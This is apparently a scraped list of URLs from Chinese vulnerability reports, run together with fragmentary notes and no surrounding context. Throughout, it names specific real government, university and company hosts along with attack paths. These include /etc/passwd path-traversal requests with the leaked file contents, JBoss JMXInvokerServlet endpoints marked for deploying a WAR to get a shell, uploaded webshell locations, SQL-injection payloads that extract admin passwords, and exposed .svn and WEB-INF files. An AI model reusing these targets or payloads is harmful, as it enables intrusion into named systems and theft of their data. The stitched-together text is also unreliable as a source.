http://www.xcrzkj.com/ http://www.bbczcvnt.com/ http://www.bociamc.com.cn/ http://www.dmjtzs.com/ http://114.242.206.5/ http://113.31.17.184/ https://family.sohu-inc.com)和搜狐办公流程系统(http://oa.sohu-inc.com/) http://12345.sanya.gov.cn/ http://**.**.**/spaportal3/jsp/portal/index.jsp http://jgxy.nbu.edu.cn/UploadFiles/200691811326612.xls http://jgxy.nbu.edu.cn/UploadFiles/200691811326612.xls http://www.cj.zstu.edu.cn/cjy/index.php?r=post/down&url=protected/config/main.php&name=main.php http://www.cj.zstu.edu.cn/cjy/index.php?r=admin http://jwc.cueb.edu.cn/UploadFile/2007-10/8/2007108134517805.xls http://jwc.cueb.edu.cn/UploadFile/2007-10/8/2007108134517805.xls http://shengji.gome.com.cn/ com:80可以被xxx.com:888等不同端口读取 http://www.10jqka.com.cn http://121.15.254.7/loginaction.shtml http://121.15.254.7:8080/ http://121.15.254.7:8080/invoker/JMXInvokerServlet http://218.60.146.37/individualSetAction!list.action http://**.**.**/social/ http://27.17.37.98:8080/social/page/jsp/index/login.action http://27.17.37.98:8080/social/page/jsp/index/login.action http://219.140.189.4:18081/upcert3/selfService/selfService_index.action http://219.140.189.4:18081/upcert3/selfService/selfService_index.action http://219.140.189.4:18081/upcert3/qwe.jsp http://www.zjggjj.gov.cn http://old.zjggjj.gov.cn http://www.xmzjefj.gov.cn/SuperviseWeb/jsp/articalWeb/indexArticalWebAction.do http://www.xmzjefj.gov.cn/invokering/JMXInvokerServlet部署war拿shell http://fx.mgyun.com/main/admin/login.aspx http://119.167.245.114:8011/showpic.asp?select_id=342 http://ideas.ac.qq.com/blog/wp-login.php http://mall.essence.com.cn/main/index.shtml http://115.231.37.4:8080/core/config/mysqlConfig.php.bak https://github.com/wangzhixing/finance_web/blob/9a261b84c73f45794eb13e73a245ad8cdb5815f9/config/smtp.properties#L9 http://222.35.91.201:7001/defaultroot/login.jsp http://pt.tsinghua.edu.cn:8081/index.asp wifi.189.cn/wap/index.jsp无限次申请上网时长卡, http://m.pconline.com.cn/member/login.htm这个接口,是太平洋电脑网一个分站登陆的接口,可以看到登陆的地方没有任何限制 username:admim password:admin*** http://www.djkfdc.com http://223.202.24.28:8081/boss-self-pc/ http://223.202.24.28:8081/showChart.jsp?filename=../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin wasu:x:500:500:wasu:/home/wasu:/bin/bash pansj:x:501:501::/home/pansj:/bin/bash boss:x:502:502::/home/boss:/bin/bash zabbix:x:503:503::/home/zabbix:/bin/bash zhongbo:x:504:504::/home/zhongbo:/bin/bash http://223.202.24.28:8081/boss-self-pc/images/sony/ http://eschedule.shanghaigm.com/JQ/DunsLogin.jsp http://doenow.shanghaigm.com/omxclient/core/login.jsp http://passport.17173.com/password/forget http://www.18j5gs.com http://pt.tsinghua.edu.cn:8081/seat_view.asp?ServiceId=3&id=216&seledDate=2015-5-11 http://218.201.232.84/ http://mobilems.corp.elong.com/feedback_showfeedback.html# http://mobilems.corp.elong.com/feedback_showfeedback.html http://**.**.** http://fast.ele.me/workflow/search/WFCustomSearchResult.jsp?query=1&moudle=&workflowid=141&pagenum=1&iswaitdo=0&docids=&tablename=formtable_main_124&issimple=true&customid=&searchtype= http://fast.ele.me/wui/main.jsp?templateId=1 http://x.xdf.cn/login.php这个接口,登陆地方没限制 http://www.caizhimofang.com/Home/Answer/answer/id/15 http://www.caizhimofang.com/Home/Answer/answer/id/15%20AND%203*2*1%3d6%20AND%20789%3d789 http://www.caizhimofang.com/Home/Answer/answer/id/15%20AND%203*2*2%3d6%20AND%20789%3d789 http://d.pigai.org/ www.rtpnr.com http://www.rtpnr.com http://www.caizhimofang.com/Home/Answer/index?id=4 http://210.51.18.248/index.php http://stat.ruc.edu.cn/plus/flink.php http://wooyun.org/bugs/wooyun-2010-0106217 http://chanye.hbncw.cn/Manage/Login.aspx http://www.shypost.com/demo/ http://www.shypost.com/demo/CompHonorBig.asp?id=44 http://www.jxhbqy.com/CompHonorBig.asp?id=6 http://www.feng-ling.com.cn/CompHonorBig.asp?id=54 http://www.smr.com.cn/CompHonorBig.asp?id=24 http://www.dd-taihua.com/english/CompHonorBig.asp?id=21 http://www.smr.com.cn/CompHonorBig.asp?id=24 http://www.feng-ling.com.cn/CompHonorBig.asp?id=54 http://202.199.224.144/english/CompHonorBig.asp?id=26 http://www.chinasuming.com/CompHonorBig.asp?id=33 http://www.czssv.com/CompHonorBig.asp?id=35 http://www.cr162.com/CompHonorBig.asp?id=10 http://www.zyjlib.com/CompHonorBig.asp?id=35 http://www.jxhbqy.com/CompHonorBig.asp?id=6 http://www.bowin.net.cn/CompHonorBig.asp?id=33 http://www.czhty.com/CompHonorBig.asp?id=40 http://218.5.241.11:8041/CompHonorBig.asp?id=18 http://shtgs.net/CompHonorBig.asp?id=35 http://www.aflft.com/CompHonorBig.asp?id=8 http://www.jlthj.com/CompHonorBig.asp?id=32 http://www.junyangchina.com/CompHonorBig.asp?id=32 http://www.aucma56.com/CompHonorBig.asp?id=54 http://www.composite.com.cn/CompHonorBig.asp?id=33 http://www.china-djh.com/Ch/CompHonorBig.asp?id=6 http://www.jrbaoya.com/CompHonorBig.asp?id=18 http://www.talent-sh.com/CompHonorBig.asp?id=17 http://www.shibm.com.cn/CompHonorBig.asp?id=31 http://www.bowenschool.cn/huashan/CompHonorBig.asp?id=4 http://www.bzinfo.ac.cn:803/lm/CompHonorBig.asp?id=10 http://www.chinalanhui.com/CompHonorBig.asp?id=50 http://www.xgxlrmy.com/CompHonorBig.asp?id=10 http://admin.10655792.cn/jsp/j_signon_check http://**.**.**/Login.aspx http://bec.pigai.org/?content-app-getschool http://bec.pigai.org:80/ http://duoyunlai.baoogu.com/logisticFactSupplierGoods/searchSupplierGoods.htm?id=5350 http://duoyunlai.baoogu.com/logisticFactSupplierGoods/searchSupplierGoods.htm?id=5349 http://duoyunlai.baoogu.com/logisticFactSupplierGoods/searchSupplierGoods.htm?id=5348 http://wooyun.org/bugs/wooyun-2015-096948 http://anbn.spacechina.com/admin/ alt.spacechina.com/guoji/856/185/066/ calt.spacechina.com/news/774/index.html calt.spacechina.com/news/list_13.html http://anbn.spacechina.com/include/uploadAttr.jsp?file_type=1&root_id=3s6260274wkC717 http://scaat.spacechina.com/picnew.asp?id=719 http://110.90.11.69/ http://110.90.11.69/invoker/JMXInvokerServlet,getshell http://cms.17k.com/ihonker.txt http://www.longliqicn.cn/login.html http://220.178.82.246/ http://220.178.82.246/invoker/JMXInvokerServlet,进行getshell http://tp.e-land.gov.tw/YilanTraffic/download.jsp?FileName=hosts&FilePath=C:\Windows\System32\drivers\etc\hosts http://www.wooyun.org/bugs/wooyun-2015-0112697/trace/fbb6b8d40ec0866b20926e12d46d550f http://db.duowan.com/dnf/equips.php?filter=q=2 http://diary.jiayuan.com/famousblog/xuxiaoping/33637.html http://co-diovan.medlive.cn/?m=case&c=option&action=detail&id=47 http://co-diovan.medlive.cn:80/?m=case&c=option&type=2&keyword=111 http://61.189.240.158:8080/login.aspx http://**.**.**/audit/pages/checkXinnetLogin.action http://user.meitun.com site:meitun.com http://payment.meitun.com/pay/toPay.htm?pid=1234 http://218.89.188.15:88/mobile/inc/get_contactlist.php?P=1&KWORD=%&isuser_info=3 http://218.89.188.15:88/mobile/user_info/data.php?P=1&ATYPE=getUserInfo&Q_ID=249 http://app.zhcw.com/wwwroot/zhcw/jsp/do3dsjhdc.jsp?method=submit&issueNo= http://app.zhcw.com/wwwroot/zhcw/jsp/ltshmtp.jsp?method=query&ISSUE_NO= id:111355重复 http://vacations.ctrip.com/insurance/order/detailreadonly/1168772259 http://vacations.ctrip.com/insurance/order/detailreadonly/1279919667 http://apping.admin5.com/?app=member&controller=index&action=login这个接口,是A5网一个分站登陆的接口,一开始登陆的地方是没有任何登陆限制的,但是输入错误几次用户名之后就跳出来验证码了 inurl:http://my.caissa.com.cn/Order/ViewTeamOrder.aspx?orderCode= http://my.caissa.com.cn/Order/ViewTeamOrder.aspx?orderCode=W201503140167732 http://my.caissa.com.cn/Order/ViewTeamOrder.aspx?orderCode=W201504120172544 http://www.meitun.com/opinion http://jzcg.faw.com.cn/ http://jzcg.faw.com.cn/register/enter_company.jsp http://218.28.234.171/ http://218.28.234.171/jmx-console http://218.28.234.171/jmx-console部署war进行getshell http://expert.ccidnet.com/中出现平行越权,可以查看其他用户信息和更改密码,而且还有存储型XSS漏洞,两者结合可以使整个网站弹弹弹。。。 http://expert.ccidnet.com/expert/expert_edit.php?eid=9146,可以通过修改eid参数遍历所有专家资料。 http://user.meitun.com/user/mail/bind http://zf.gzcg.gov.cn:8090/auth/login.action http://www.regenttaipei.com/galleria_e/bday.php?gid=6 http://jyz.homelink.com.cn/mypower/downloadUrl.php http://www.ilas.com.cn/ Exception:ORA-01756 http://tsg.sz1z.net.cn/NTBookAdvancedSearch.aspx?page=1&Index1=4&KeyWord1=a&strAcurate1=0&Index2=5&KeyWord2=&strAcurate2=0&Index3=6&KeyWord3=a&strAcurate3=0&SrchTab=0&publishFrom=0&publishTo=0&nSort=0 http://61.136.150.169/NTBookAdvancedSearch.aspx?page=1&Index1=4&KeyWord1=a&strAcurate1=0&Index2=5&KeyWord2=&strAcurate2=0&Index3=6&KeyWord3=a&strAcurate3=0&SrchTab=0&publishFrom=0&publishTo=0&nSort=0 http://ilaslib.zcu.edu.cn/NTBookAdvancedSearch.aspx?page=1&Index1=4&KeyWord1=a&strAcurate1=0&Index2=5&KeyWord2=&strAcurate2=0&Index3=6&KeyWord3=a&strAcurate3=0&SrchTab=0&publishFrom=0&publishTo=0&nSort=0 http://211.64.123.7/NTBookAdvancedSearch.aspx?page=1&Index1=4&KeyWord1=a&strAcurate1=0&Index2=5&KeyWord2=&strAcurate2=0&Index3=6&KeyWord3=a&strAcurate3=0&SrchTab=0&publishFrom=0&publishTo=0&nSort=0 http://www.sjy-art.org:8081/NTBookAdvancedSearch.aspx?page=1&Index1=4&KeyWord1=a&strAcurate1=0&Index2=5&KeyWord2=&strAcurate2=0&Index3=6&KeyWord3=a&strAcurate3=0&SrchTab=0&publishFrom=0&publishTo=0&nSort=0 Exception:ORA-01756 http://61.136.150.169/NTBookRetrNewBookDetail.aspx?page=2&type=242&ClassKey=A http://www.sjy-art.org:8081/NTBookRetrNewBookDetail.aspx?page=2&type=242&ClassKey=A http://211.64.123.7/NTBookRetrNewBookDetail.aspx?page=2&type=242&ClassKey=A http://219.134.129.51/NTBookRetrNewBookDetail.aspx?page=2&type=242&ClassKey=A http://tsg.sz1z.net.cn/NTBookRetrNewBookDetail.aspx?page=2&type=242&ClassKey=A http://kf.web.playcrab.com/question/index?fid=4&sid=10 http://kf.web.playcrab.com/question/detail?code=R7uMf3QC5E2c2pQdTe http://www.whgh.org http://www.kangq.com http://loupan.ythouse.com/main/map_baidu.php?sid=487 http://218.22.20.206/defaultroot/login.jsp http://218.22.20.206/invoker/JMXInvokerServlet,部署war进行getshell http://www.samsoncn.com/ http://passport.mplife.com/login.aspx这个接口,登陆的地方有验证码 http://zjkygl.aqsiq.gov.cn/system/user_updateEmail.action http://zjkygl.aqsiq.gov.cn/system/user_findUser.action http://member.9978.cn/login这个接口,也就是9978网主站登陆的接口,可以看到登陆的地方没有任何限制 http://adsmart.dangdang.com http://report.dangdang.com/ http://blog.dangdang.com/ http://report.dangdang.com/s-login http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../ http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../../AppServ/www http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../../bawang http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../../bawang/OA Email:rong.hu@bawang.com.cn http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../../bawang/wap/nianhui http://www.bawang.com.cn/wap/nianhui/admins/login.php http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../../bawang/wap/nianhui/admins/upfiles/up http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../../bawang/wap/nianhui/admins/upload/ http://www.bawang.com.cn/wap/nianhui/admins/upload/upFiles.php http://www.bawang.com.cn/wap/nianhui/admins/upload/index.php font-family:tahoma,verdana,arial;font-size:12px;line-height:20px;color:#333333;margin-left:0px padding:3px font-size:12px http://duoyunlai.baoogu.com:80/ http://61.178.82.54:9090/zjgl/publicQueryCard.action http://61.178.82.54:8090/exam/login.action http://61.178.82.54:9090/zjgl//qwe.jsp http://www.dcnetworks.com.cn/ http://baby.haier.com/ http://baby.haier.com/Diet/detail/rid/81839 http://mantis.cvte.cn/.svn/entries http://vote.cvte.cn/.svn/entries http://i.cvte.cn/.svn/entries http://a3.cvte.cn/.svn/entries http://s.cvte.cn/.svn/entries http://doc.cvte.cn/.svn/entries http://customer.cvte.cn/.svn/entries http://fs.cvte.cn/.svn/entries http://cps.cvte.cn/.svn/entries http://3g.club.xywy.com/ http://bbr.cashq.ac.cn:8080/ http://bbr.cashq.ac.cn:8080/general/vmeet/wbUpload.php?fileName=1.php+ http://bbr.cashq.ac.cn:8080/general/vmeet/wbUpload/1.php http://xyjg.egs.gov.cn/ECPS_HB/qyxxgsAction_initQyxyxxMain.action?nbxh=MjQyNTAwMDAwMTI5Mzc3Nzk= http://gsxt.ngsh.gov.cn/ECPS/enterpriseAbnAction_enterpriseList.action?curr_Page=1 http://xygs.gsaic.gov.cn/gsxygs/pub!getCommon.do?parm=excplist http://love.17173.com/ajax/getajaxinfo.php?url=http://10.59.96.41/&Work=getnewsinfo http://www.yiban.cn http://www.91160.com/forum/detail/id-145.html回复都可xss www.yiban.cn http://link.baidu.com/myrouter/wifiLogin?target=self&getNasBduss=1&toUrl=http://192.168.99.1/cgi-bin/luci/unauth/verify?bdact=login&device_id=null http://192.168.99.1/cgi-bin/luci/;stok=15ee99093643c56457993fdd8dae9773/admin/wifi_n_setting http://xxx.com/admin/fckeditor/editor/dialog/fck_about.html来查看编辑器版本 http://113.31.81.83/ http://113.31.81.83/invoker/JMXInvokerServlet虽然有认证,但是弱口令 http://cloud.efly.cc/index.php/Index/tubeBureau?t=1 http://www.china119.org.cn/admin http://changs.ccgp-hunan.gov.cn:9002/wpwebsys_cs/sys/login!index.action http://gsxt.bjaic.gov.cn/login/newsDetailBj.action http://www.tjqx.gov.cn:81/login.action http://m.apk8.com/info/theme.php?id=2279 http://**.**.** http://hd.1905.com/index.php/Content/detail?id=9 http://119.90.36.104/index.action http://125.62.14.70/ http://125.62.14.70/jmx-consoleing Communicate.asmx/TransformData Communicate.asmx/TransformData http://futures.shihua.com.cn/ http://113.31.81.82/login.jsp http://futures.shihua.com.cn/ http://futures.shihua.com.cn/invoker/JMXInvokerServlet进行getshell http://futures.shihua.com.cn/chopper/chopper.jsp http://www.xunzai.com/company/?id=1 inurl:xunzai.com intitle:admin出后台 http://121.41.102.183:88/res/upload/head/passenger/20150512122136387.asp http://tscp.tempus.cn/supplier/register.do http://tscp.tempus.cn/updownFiles/agent/20150512125902.jsp https://i.gw.com.cn https://i.gw.com.cn javascript://伪协议来定义主页神马的,但是这些都不是本文的重点。重点是一个比较严重的设计缺陷导致命令执行。 Javascript://协议的关系,导致直接调用2345://协议,即本地域,去执行代码,这样一来,危害就很大了。 http://mail.sihc.com.cn/ http://mail.xxx.com.cn/src/ajaxserver.php?exec=recall http://yt.linekong.com/image.php?image_id=15500 http://admin.tsz.gfan.com http://admin.tsz.gfan.com/index.php?mod=index&act=Showlist&serverid=1023 http://admin.tsz.gfan.com/index.php?mod=gamedata&act=downregrole&uid=&serverid=1093&starttime=&endtime= http://passport.yesky.com/jsp/newyesky/yeskysys_pass.jsp这个接口,登陆的地方没有任何限制 http://syjx.njxzc.edu.cn/zhanshikebiao.aspx?centid=799&date=2013-12-20&xyid= http://lab.njnu.edu.cn/dkysy/zhanshikebiao.aspx?centid=23&date=2013-12-13&xyid= http://coalab.njupt.edu.cn/nykzsy/zhanshikebiao.aspx?centid=702&date=2015-3-21&xyid= http://sygl.njfu.edu.cn/zhanshikebiao.aspx?centid=32&xykcid=71&skjsid=68671&labid=290&xqid=5 http://dxscx.forestpolice.net/zhanshikebiao.aspx?centid=32&date=2015-3-21&xyid= http://www.multigold.com.cn/ http://zqb.creditease.cn http://data.pension.hexun.com/ http://222.66.10.72/kwms/WEB-INF/web.xml http://222.66.10.72/kwms//WEB-INF/applicationContext.xml http://wapi.hexun.com/Api_newsXml.cc?appId=1&pid=1002347218&pc=20&pn=1 http://113.98.241.231:7979/mineinfo http://183.238.123.235:7979/mineinfo http://wechat.zhiwo.com/ http://www.lljtj.com/ http://www.kingyee.com.cn http://www.medlive.cn/ http://www.kingyee.com.cn//WEB-INF/config/applicationContext-common.xml http://www.kingyee.com.cn/WEB-INF/web.xml等,就不一一列出来了。 http://sm.laiyifen.com/.svn/entries http://wx.laiyifen.com/.svn/entries http://mail.laiyifen.com/names.nsf http://mail.laiyifen.com/webadmin.nsf http://bh.szdiyibo.com/index.php?a=newlist&term=3 http://www.szdiyibo.com/admin/ lg.szdiyibo.com/admin/ bh.szdiyibo.com/admin/ http://scm.flnet.com/Fckeditor/)。(注:此服务器可被提权,黑客很可能已经获取system权限并进行内网渗透) http://www.flnet.com/Index.aspx.bak http://image.flnet.com/icons/small/ http://b2b.flnet.com/editor/license.txt www.gdtech.com.cn http://58.59.177.92:7001/jxhd/Login.action http://123.233.251.222/jxhd/Login.action http://112.230.195.19:8888/jxhd/Login.action http://www.wgyzx.com:7001/jxhd/welcome.action http://124.128.82.110//jxhd/Login.action http://222.187.45.125:7001//jxhd/Login.action http://www.zhejiang.gov.cn/vipchat/home/front/search/opr_chatsearch.jsp?action=simplesearch&keywords= http://baoxian.gome.com.cn/car/order/view_pa http://baoxian.gome.com.cn/car/order/view_pa?orderId=1000007704&applyPolicyId=2000007704 http://doc.epa.gov.tw/IFDEWebBBS_EPA/Download.ashx?path=C:\Windows\System32\drivers\etc\&file=hosts http://service.yi-phone.com为例 http://www.91160.com http://113.106.85.45/ http://113.106.85.45/invoker/JMXInvokerServlet,getshell http://**.**.**/netpreasign/_ http://**.**.**/reglogin/login.domethod=toFindPwdPage_ http://**.**.**/reglogin/tel.domethod=getTelCheckCode&telphone=15193938888_ http://user.anjuke.com/my/login?history=aHR0cDovL3VzZXIuYW5qdWtlLmNvbS9tZW1iZXIvbW9kaWZ5L3VzZXJpbmZvLw==主站的登陆接口没有任何登陆限制 http://xyz.51job.com/Internal/Login.aspx http://www.huazhu.com/login.aspx?backURL=http%3a%2f%2fwww.huazhu.com%2fmyht%2findex.aspx就在主站的登陆接口,发现是有验证码限制的,但是这个验证码是可以绕过的 http://www.panbaidu.net/source/include/cron/cron_todayviews_dailys.php http://117.79.80.15:8088/ http://117.79.80.15:18880 http://wiapi.hexun.com/search/fundnotice.php?code=001011&p=1&c=20 http://member.multigold.com.cn http://zzzs.gxzyjy.net:80/servlet/DownLoadAttachmentServlet?type=notice&fileId=163&serverfilename=../../../../../../../../etc/passwd http://szgl.net/sub09/news-detail.asp?id=10164 http://www.wfdpc.gov.cn http://203.93.109.54:8080/cqpt/index.action http://www.cqjt.gov.cn/ http://61.138.188.178/ http://www.isun3d.com/admin/upfile.php http://www.excelsz.com/admin/upfile.php http://www.ythkj.cn/admin/upfile.php http://www.xiliufu.com/admin/upfile.php http://www.uv-print.net/admin/upfile.php http://www.szyouyun.net/admin/upfile.php http://www.sunet-sz.com/admin/upfile.php http://www.teralinks.com/admin/upfile.php http://www.idiadem.com/admin/upfile.php http://www.xyintl.com/admin/upfile.php http://www.skilhunt.com/admin/upfile.php http://www.isun3d.com/upfile/201504020522488961.php http://www.excelsz.com/upfile/201505121915536504.php http://www.ythkj.cn/upfile/201505121916478712.php http://www.xiliufu.com/upfile/201505121117376368.php http://www.uv-print.net/upfile/201505121918223617.php http://www.szyouyun.net/upfile/201505121919086902.php http://www.sunet-sz.com/upfile/201505121919516808.php http://www.teralinks.com/upfile/201505120420317024.php http://www.idiadem.com/upfile/201505120421188597.php http://www.xyintl.com/upfile/201505121922216169.php http://www.skilhunt.com/upfile/201505120423116727.php http://etds.lib.ncku.edu.tw/etdservice/searching?query_word1=1&query_field1=keyword http://sf-express.mlpplus.gikoo.cn/ http://59.175.201.156/中交第二航务工程局有限公司办公系统 http://59.175.201.156/invoker/JMXInvokerServlet,部署war进行getshell http://oa.wuzhouair.com/ http://www.glsc.com.cn:80/glzq/broker/advisorQuery.jsp?advisorName=135791 https://www.glsc.com.cn/kh/page_wykh.dhtml?page_from=gfwz http://apk.angeeks.com/queryListByPN.do?packagename=air.com.tencent.qqpasture http://www.jjghj.gov.cn/jjghj/admin/login.php http://www.econews.cn/ http://211.162.68.72/invokers/JMXInvokerServlet,部署war进行getshell http://hb.zbglxt.com/Factory/AjaxGetCSDM.aspx?CSDM=TEST http://henan.zbglxt.com/Factory/AjaxGetCSDM.aspx?CSDM=TEST http://qh.zbglxt.com/Factory/AjaxGetCSDM.aspx?CSDM=TEST http://zbtj.hyedu.net.cn/Factory/AjaxGetCSDM.aspx?CSDM=TEST http://hainan.zbglxt.com/Factory/AjaxGetCSDM.aspx?CSDM=TEST http://tzgl.ynjy.cn//Factory/AjaxGetCSDM.aspx?CSDM=TEST http://passportm.linekong.com/epassport_mid/xmlRpcServerServlet http://mp.linekong.com http://tdl01.8864.com/lkcps/ http://passportm.linekong.com/epassport_mid/xmlRpcServerServlet http://b2b.10086.cn/b2b/main/listVendorNotice.html?noticeType=2 http://b2b.10086.cn/b2b/main/listVendorNoticeResult.html?noticeBean.noticeType=2 http://b2b.10086.cn/b2b/main/listVendorNotice.html?noticeType=2 http://salesorder.meitun.com:80/consignee/saveConsignee http://58.50.254.85/SZOA/login.jsp http://58.50.254.85/jmx-console/ http://58.50.254.85/invoker/JMXInvokerServlet http://www.lhdtxx.com/ http://yzcqxx.com/ http://www.tzby.net/ http://htzx.jbedu.net/ http://www.lhzzx.cn:8080/ http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd http://www.w3.org/1999/xhtml http://detail.51credit.com/javascript/jquery-1.4.2.min.js http://img.51credit.com/credit/images/DD_belatedPNG.js http://www.xiaozhu.com/findpwdbyphone http://www.xiaozhu.com/ajax.php?op=AJAX_CheckConfirmCode&mobile=18551813248&confirmcode=7690 http://blog.1905.com/.svn/entries www.scal.com.cn/invite2011/admin/Admin_Invite.aspx此为漏洞地址,通过 www.scal.com.cn/invite2011/可报名和查看后台 www.scal.com.cn/invite2011/admin/Admin_Invite.aspx此处泄漏大量敏感数据 http://www.scal.com.cn/invite2011/admin/Admin_Invite.aspx http://member.multigold.com.cn http://zqb.creditease.cn http://ma.263em.com/gainvideo!saveOrUpdate.action http://221.192.132.15 http://**.**.**/WebReport/login.html http://e.qufenqi.com http://my.yaolan.com FTP:58.213.141.190:21 http://hb.htsc.com.cn/favicon.ico/a.php http://lvyou.baidu.com/plan/ajax/getRecommendPlans?surl= http://180.166.7.94 http://www.flnet.com/ http://logistics.flnet.com/login.aspx https://github.com/jayxigua/tools/blob/39144ee8fc1e8ec7b6db3dacf04a0141ba407fb6/mail/src/main/java/chilkatsoft/ChilkatExample.java http://crm.qufenqi.com http://aq.gdca.gov.cn:80/ http://aq.gdca.gov.cnIWIN=119253558 http://weixin.17ugo.com/index.php/system/account_saveaccount.php http://weixin.17ugo.com http://hnxxlr.hnlmmarket.com/admin/index.php http://222.74.224.21/buyFlow.do?method=judgeUser&type=2 http://222.74.224.21 http://**.**.**/ android:name=".PushMsgReceiver android:name="com.yongche.component.groundhog.RECEIVED_MESSAGE com:8080/customize/nwc_755_newvexam/login/login.aspx http://2015.gzcdc.org.cn/news/downtxt.aspx?filename=../../news/downtxt.aspx http://2015.gzcdc.org.cn/news/downtxt.aspx?filename=../../news/downtxt.aspx.cs http://www.ie.tsinghua.edu.cn/alumni/index.php?key=&ty=211&newsorder=sendtime&StartPage= http://www.baic.gov.cn//zxbs/ http://movie.js118114.com/adminax/manage/orders/OrderEList.aspx http://movie.js118114.com/adminax/manage/orders/ http://movie.js118114.com/Cinemas/ inurl:contentmanager.do?method=view http://60.247.10.155:8001/cms/columnmanager.do?method=NewsCommonSearch&title=1&type=new www.cnstedu.cn/cms/columnmanager.do?method=NewsCommonSearch&title=1&type=new http://kxsz.gdec.net/cms/columnmanager.do?method=NewsCommonSearch&title=1&type=new http://www.cimuset.org//cms/columnmanager.do?method=NewsCommonSearch&title=1&type=new http://www.fdstmc.org.cn//cms/columnmanager.do?method=NewsCommonSearch&title=1&type=new http://www.chinaworldmall.cn//cms/columnmanager.do?method=NewsCommonSearch&title=1&type=new http://www.sqkpym.org.cn/cms/columnmanager.do?method=NewsCommonSearch&title=1&type=new http://60.247.10.155:8001/cms/columnmanager.do?method http://sqlmap.org http://60.247.10.155:8001/cms/columnmanager.do?method http://sqlmap.org http://eip.laiyifen.com/这个系统,但是登录框不是密码,要什么RSA码才能登录,试了上面的几个用户,都不能登录,而且通过之前的漏洞,我们是可以知道有OA系统的,但是OA系统在外网访问不了 site:eip.laiyifen.com来搜索一下 http://duoyunlai.baoogu.com/logisticFactSupplierGoods/toAddSupplierGoods.htm http://ss.263.net/SelfService/register/userRegister.action http://ecs.263.net/getContactGroupInfo?CONTACTS_GROUP_ID=23520&t=0.6552546233447352 http://ecs.263.net/queryContactInfo?ID=710815 http://ecs.263.net/delContact?CONTACTS_ID_LIST=710821 http://ecs.263.net/getContactGroupInfo?CONTACTS_GROUP_ID=23521&t=0.3077797630749748 http://erm-kbs.ruc.edu.cn/ext/Info.aspx?t=datatable118&id=1 http://erm-kbs.ruc.edu.cn/ext/Info.aspx?t=datatable118&id=1%27and%201=@@version-- campus.baidu.com/integral/excentity http://116.211.4.142 http://116.211.4.142:9000/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat%280x3C6162633E,group_concat%280x7C,userid,0x3a,pwd,0x7C%29,0x3C2F6162633E%29,5,6,7,8,9%20from%20%60%23@__admin%60%23%22 http://nczfgjj.com/a/detail/2011-1-20/78.html https://stat.bilibili.tv/ http://202.110.193.50:9080/zdcl/ http://dgdz.cic.tsinghua.edu.cn/bbs/viewdoclist.jsp?groupid=000000034 http://122.225.112.179/mLoginAction.do http://115.239.232.35/mLoginAction.do http://122.225.112.179 http://58.210.126.195/ http://122.224.142.233/pub/index.do?sysCmd=loginOpt http://122.224.142.233/invoker/JMXInvokerServlet http://122.224.142.233/jmx-console/ http://973.typhoon.gov.cn/down.php?f=L2V0Yy9wYXNzd2Q= http://973.typhoon.gov.cn/down.php?f=L2V0Yy9wYXNzd2Q= root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/mega/ftp/ftp/pub/:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin 